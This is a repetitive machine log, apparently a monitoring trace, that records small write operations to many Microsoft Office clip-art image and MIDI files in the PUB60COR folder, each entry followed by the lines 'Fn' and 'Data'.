Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297229.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297269.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297725.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297727.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297757.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297759.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0300862.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0301044.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0301052.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0301418.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0301432.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304371.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304405.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304853.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304861.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304875.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309567.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309585.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309902.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309904.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309920.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313970.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0314068.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0318448.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0318804.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0318810.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0324694.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0324704.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341455.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341475.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341499.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341557.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341561.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341636.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341654.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341738.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG size = 186 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG size = 186 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG size = 186 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG size = 185 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG size = 186 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386120.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387882.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\JAVA_01.MID size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\JNGLE_01.MID size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\MP00021_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\MP00132_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\MP00646_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\MUSIC_01.MID size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00042_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00057_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00058_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00068_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00238_.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00330_.WMF size = 1 True 1
Fn
Data
